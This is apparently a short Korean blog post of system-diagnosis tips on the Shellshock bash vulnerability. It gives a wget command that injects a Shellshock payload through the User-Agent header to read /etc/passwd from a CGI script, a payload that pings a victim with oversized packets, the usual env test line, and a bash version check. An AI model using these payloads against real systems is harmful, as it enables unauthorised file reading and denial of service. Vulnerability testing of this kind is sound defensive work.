본문으로 바로가기

쉘쇼크 공격 진단하기

category 시스템 진단 팁 2017. 1. 4. 16:24
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/test.cgi

() { :; }; ping -s 1000000 <victim IP>

Shell Shock 테스트 코드 ( Bash version 4.2.50(1) release GNU)
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Shell Shock 취약점은 bash 4.3부터 패치되었다.

bash의 버전체크는 아래와 같이 한다.

bash --version.